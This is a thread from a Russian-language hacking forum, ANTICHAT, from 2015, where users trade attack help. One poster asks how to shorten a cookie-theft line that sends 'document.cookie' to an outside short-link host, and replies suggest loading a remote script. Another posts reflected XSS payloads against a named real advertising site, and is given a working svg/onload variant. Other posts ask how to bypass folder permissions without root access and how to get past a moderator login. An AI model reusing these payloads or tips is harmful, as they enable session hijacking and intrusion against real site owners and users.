ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.07.2015, 01:23
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Сообщение от djon
djon said:
↑
Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG?
"+document.cookie; укоротить до 45 символов ? Подключите удаленный скрипт
|
|
|
12.07.2015, 02:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
4134
Репутация:
0
|
|
На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д Как админ так хитро ограничил доступ?
|
|
|
|
12.07.2015, 02:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от Bragal
Bragal said:
↑
На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д
Как админ так хитро ограничил доступ? Ничего хитрого, просто правильно расставлены ограничения.
|
|
|
|
12.07.2015, 03:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
4134
Репутация:
0
|
|
Сообщение от OxoTnik
OxoTnik said:
↑
Ничего хитрого, просто правильно расставлены ограничения. И каким же образом? Реально обойти без получения рута?
|
|
|
|
12.07.2015, 11:32
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от djon
djon said:
↑
Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG?
"+document.cookie; укоротить до 45 символов ?
Сообщение от ocheretko
ocheretko said:
↑
Подключите удаленный скрипт на всякий случай можно без кавычек и без http.
|
|
|
|
12.07.2015, 13:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
51198
Репутация:
3
|
|
Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? .
|
|
|
|
12.07.2015, 15:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
13708
Репутация:
0
|
|
Привет всем,можно ли создать скрипт самоудаляющейся чтобы и теги его тоже удалялись?
|
|
|
|
13.07.2015, 00:11
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Сообщение от nik1201
nik1201 said:
↑
Привет всем,можно ли создать скрипт
самоудаляющейся чтобы и теги его тоже удалялись?можно
|
|
|
|
13.07.2015, 00:35
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:
Код:
Code:
alert(/olololkin2/);
Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox
Код:
Code:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1
User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
В первый раз такое. Адрес:
Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221
|
|
|
|
13.07.2015, 00:53
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от ocheretko
ocheretko said:
↑
Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:
Код:
Code:
alert(/olololkin2/);
Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox
Код:
Code:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1
User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
В первый раз такое. Адрес:
Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221
я пока сам не понял в чем дело, однако prompt() срабатывает:
Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
